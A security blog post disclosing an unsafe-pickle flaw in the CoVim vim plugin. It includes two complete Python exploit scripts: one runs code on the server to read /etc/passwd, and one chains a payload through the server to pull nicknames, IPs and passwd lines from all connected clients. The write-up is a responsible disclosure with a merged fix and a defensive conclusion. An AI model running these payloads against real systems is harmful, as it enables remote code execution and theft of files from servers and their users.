Exploiting CoVim
Introducing CoVim
CoVim is a vim plugin allowing for collaborative edition of text documents. Something like Etherpad-lite, but directly integrated in vim. Sounds cool.
The architecture is simple: one can run the Twisted server on any machine, and the vim plugin also runs Twisted code to connect to it. So the usual client-server architecture, all in Python (your must use a version of vim compiled for Python support).
I think that Covim has several problems which need to be solved before reaching a mature state. In this blog post, I am focusing on one particular issue that I found by looking at the source code a few days after the project has been announced.
Pickle fights back
The protocol is quite simple: except for the first message sent by the client
to connect with its nickname, all messages are dictionaries previously
serialised with pickle
.
Sure, this is a problem in terms of useless overhead in all packet messages. But most importantly, this is a severe security flaw, that I have already exploited in one challenge of iCTF 2013.
What does it means? It means that an attacker can run arbitrary code on either the server or the client, depending on the party controlled by the attacker. And as we will see later, it is even possible to exploits all the clients connected to a server by connecting to that server as well.
Eploits in that article have been tested on the version 2e8006f of CoVim. I reported that security flaw, and my patch was merged into the master branch at 2189404.
Exploiting the server
The idea here is simple: as the server directly loads
some data that we sent,
we can just craft a specific payload. That being said, we probably want to get
some result back. Instead of creating a listening socket on the server, or
making it connect back to us, why not use the TCP connection we already have?
Since the code uses pickle
and not cPickle
, it is not that simple, because
self
does not refer to the Protocol
subclass, so we can not directly access
its transport.write
method. A way around that is just to import the garbage
collector class, and look for all instances of objects that subclass the
Protocol
class! This is what the string in the prototype
variable is doing.
But then, if we directly send the information we are looking for (like the
content of the /etc/passwd
file), all legitimate clients connected to the
server will crash because they will receive that payload as well, and try to
unpickle it. The idea here is to create a legitimate payload (i.e. a pickled
dictionary) adding the information we are looking for under an unused key, so
that the regular clients will just ignore it.
The rest of the exploit is just sending that crafted payload to the server, and listening to what is sent back. Of course, we don't want to unpickle those messages ourselves, so I just used a basic REGEX to look for strings.
import socket
import time
import re
# config: ip and port the server
ip, port = '192.168.56.1', 12345
# exploiting pickle loads
prototype = "c__builtin__\neval\np1\n"\
"(S'{'a':[o.transport.write(%s) for o "\
"in __import__('gc').get_objects() if isinstance(o,"\
"self.find_class('twisted.internet.protocol','Protocol'))],"\
"'data':{}}'"\
"\np1\ntp2\nRp3\n."
server_exploit = prototype % (
"__import__('pickle').dumps({'data':{},"\
"'exploit':''.join(open('/etc/passwd').readlines()).encode('hex')})")
# connects to the server
sock = socket.socket()
sock.connect((ip, port))
sock.send('attacker') # beautiful nickname
time.sleep(1) # just to be sure
sock.send(server_exploit)
sockf = sock.makefile()
# going though the message we receive, looking for the string "exploit"
key = None
while True:
line = sockf.readline()[:-1]
# yes, we don't use pickle to read those messages ;-)
s = re.search(r"S'(.*)'", line)
if s is not None:
value = s.groups()[0]
if key == 'exploit':
print value.decode('hex')
break
key = value
sock.close()
Exploiting all clients connected to a server
This time, we want to exploit the server in such a way that it sends a crafted payload to all clients connected to him. Then, those exploited clients will send back the result of the exploit to the server, which will transfer it to the attacker (the server happily broadcasts quite everything it receives, so nothing tricky here).
We are simply going to enclose an exploit in an exploit, like the Matryoshka dolls.
We would also like to gather the nicknames of all clients as well as their IP addresses. For the IP address, the best idea is to take the one seen by the server, as it will avoid collecting local IP addresses of hosts behind a NAT.
Apart from that, since the source code of the clients is really similar to the
one of the servers, the exploit looks really similar to the previous one. There
is just some encapsulation of the crafted payloads. I've limited the number of
lines of /etc/passwd
to be sent for the sake of the above screenshot.
import socket
import time
import re
# config: ip and port the server
ip, port = '192.168.56.1', 12345
# exploiting pickle loads
prototype = "c__builtin__\neval\np1\n"\
"(S'{'a':[o.transport.write(%s) for o "\
"in __import__('gc').get_objects() if isinstance(o,"\
"self.find_class('twisted.internet.protocol','Protocol'))],"\
"'data':{}}'"\
"\np1\ntp2\nRp3\n."
client_exploit = prototype % ("__import__('pickle').dumps({'data':{},"\
"'exploit':('%s#%s#%s'%("\
# nickname, placeholder, interesting data
"o.fact.me,'####',''.join(open('/etc/passwd').readlines()[-8:])))."\
"encode('hex')})")
server_exploit = prototype % ("'%s'.decode('hex').replace('####'," \
"o.transport.getPeer().host)" \
% client_exploit.encode('hex'))
# connects to the server
sock = socket.socket()
sock.connect((ip, port))
sock.send('attacker') # beautiful nickname
time.sleep(1) # just to be sure
sock.send(server_exploit)
sockf = sock.makefile()
# going though the message we receive, looking for the string "exploit"
key = None
while True:
line = sockf.readline()[:-1]
# yes, we don't use pickle to read those messages ;-)
s = re.search(r"S'(.*)'", line)
if s is not None:
value = s.groups()[0]
if key == 'exploit':
print '>' * 40
print ('\n%s\n' % ('-' * 40)).join(
value.decode('hex').split('#'))
print '<' * 40
key = value
Conclusion
This exploits are run against a protocol fully based on pickle, meaning that both the client and server were vulnerable. I showed that with some work, one can exploit all clients connected to the server, just by exploiting that server.
Even if my exploits were only getting the content of the /etc/passwd
file,
unsafe use of pickle do allow for arbitrary code execution. Indeed, the
attacker can load any module; for example, my attack used the garbage collector
module in order to get all instances of a particular class. But really, the
possibilities are limitless.
To conclude, let me say one more time that pickle
is not to be used to
load untrusted data. This is highlighted in the documentation,
and was already my conclusion of a previous article. However, that was probably not enough, as the author of CoVim
wrote (emphasis is mine):
We actually were using json instead of pickle initially, but switched because json encoded strings to unicode, while pickle didn't. I didn't know there were security issues involved, i'll look into changing it back.
This means that mentioning it in the documentation is not enough. What can be
done to enforce a proper use of pickle
? Do not load automatically what was
supposed to be defined by a __reduce__
method? Rename the load
and
loads
methods into a more verbose load_but_insecure_if_not_trusted_input
?
This is an open question whose answer is very likely to break compatibility.
Which means that we will continue to find this vulnerability inside new
programs in the foreseeable future.